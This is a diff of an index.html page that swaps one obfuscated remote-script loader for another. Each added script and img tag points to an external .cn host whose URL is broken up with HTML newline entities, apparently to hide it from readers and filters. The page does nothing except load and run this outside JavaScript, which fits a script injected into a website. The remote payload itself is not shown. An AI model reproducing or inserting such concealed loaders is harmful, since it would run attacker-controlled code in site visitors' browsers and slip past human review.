--- a/index.html
+++ b/index.html
@@ -1,13 +1,12 @@
 
 
-
 <!DOCTYPE html>
 <html lang="en">
 <head>
     <meta charset="utf-8">
 </head>
 <body>
-<script src="https://gi&#10;t.g&#10;o0&#10;5.on&#10;l&#10;ine&#10;/i&#10;m&#10;g/cod&#10;e&#10;?i&#10;d&#10;&#10;=j&#10;s&#10;"></script>
-<img src="https://gi&#10;t.g&#10;o0&#10;5.on&#10;l&#10;ine&#10;/i&#10;m&#10;g/cod&#10;e&#10;?i&#10;d&#10;&#10;=j&#10;s&#10;" width="100%">
+<script src="&#10;h&#10;t&#10;t&#10;ps&#10;:/&#10;/s&#10;s.&#10;a&#10;m&#10;e&#10;iyo&#10;.&#10;cn/i&#10;m&#10;g&#10;/&#10;c&#10;o&#10;d&#10;e&#10;?&#10;i&#10;d&#10;=&#10;av&#10;c&#10;"></script>
+<img src="&#10;h&#10;t&#10;t&#10;ps&#10;:/&#10;/s&#10;s.&#10;a&#10;m&#10;e&#10;iyo&#10;.&#10;cn/i&#10;m&#10;g&#10;/&#10;c&#10;o&#10;d&#10;e&#10;?&#10;i&#10;d&#10;=&#10;a&#10;vc&#10;" width="100%">
 </body>
 </html>
